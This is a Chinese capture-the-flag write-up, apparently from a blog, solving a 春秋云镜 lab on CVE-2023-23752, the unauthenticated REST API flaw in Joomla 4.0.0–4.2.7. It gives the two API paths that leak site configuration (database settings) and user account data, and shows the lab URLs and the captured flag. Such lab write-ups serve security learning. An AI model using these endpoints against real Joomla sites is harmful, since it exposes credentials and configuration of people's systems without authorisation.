[春秋云镜] CVE-2023-23752 writeup

首先奉上大佬的wp表示尊敬:(很详细)[ 漏洞复现篇 ] Joomla未授权访问Rest API漏洞(CVE-2023-23752)_joomla未授权访问漏洞(cve-2023-23752)-CSDN博客

知识点

  • Joomla版本为4.0.0 到 4.2.7 存在未授权访问漏洞

    • Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行
  • 未授权api路径

    • 获取网站的配置文件信息
      • /api/index.php/v1/config/application?public=true
    • 获取账号密码信息
      • api/index.php/v1/users?public=true
    • 其他api接口
      • 详见开头大佬的wp结尾
  • REST API

解题思路

题目地址:Home

点击连接进入到网页初始页面

可以看到旁边有很多的链接:登录界面,找回密码界面,找回用户名界面

通过测试发现这些界面无法进入,到这里已废,只能求助大佬的wp

发现了未授权的接口链接:

复制代码
获取网站的配置文件信息:
/api/index.php/v1/config/application?public=true

将该路径添加到网站后面发现成功得到了配置文件的信息:数据库的相关配置信息

复制代码
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/config/application?public=true
复制代码
获取网站的账号密码信息:
api/index.php/v1/users?public=true

通过构造访问得到了flag:flag{c68a8080-245b-4892-9053-21dbb6ad0fa0}

复制代码
http://eci-2ze1t0ekrilu5ao4y7hg.cloudeci1.ichunqiu.com/api/index.php/v1/users?public=true

10

相关推荐
电院工程师10 小时前
基于机器学习的侧信道分析(MLSCA)Python实现(带测试)
人工智能·python·嵌入式硬件·安全·机器学习·密码学
WHOAMI_老猫13 小时前
渗透实战:绕过沙箱机制的反射型XSS
javascript·渗透测试·靶场·教程·xss
easyboot14 小时前
openssl创建证书解决不安全问题
运维·服务器·安全
qq_4309085714 小时前
网络安全迎来了新契机
安全·web安全
安全系统学习15 小时前
【网络安全】文件上传型XSS攻击解析
开发语言·python·算法·安全·web安全
百分百题库APP15 小时前
从事登高架设作业需要注意哪些安全事项?
安全
mCell18 小时前
密码校验与攻击面:不再“裸奔”的防线
后端·安全·go
Listennnn1 天前
AI Agent开发与安全
人工智能·安全
安 当 加 密1 天前
如何通过密钥管理系统实现数据库、操作系统账号和密码的安全管理
网络·数据库·安全
Gappsong8741 天前
网络安全人才缺口:高需求背后的深层矛盾与突围之道
安全·web安全·网络安全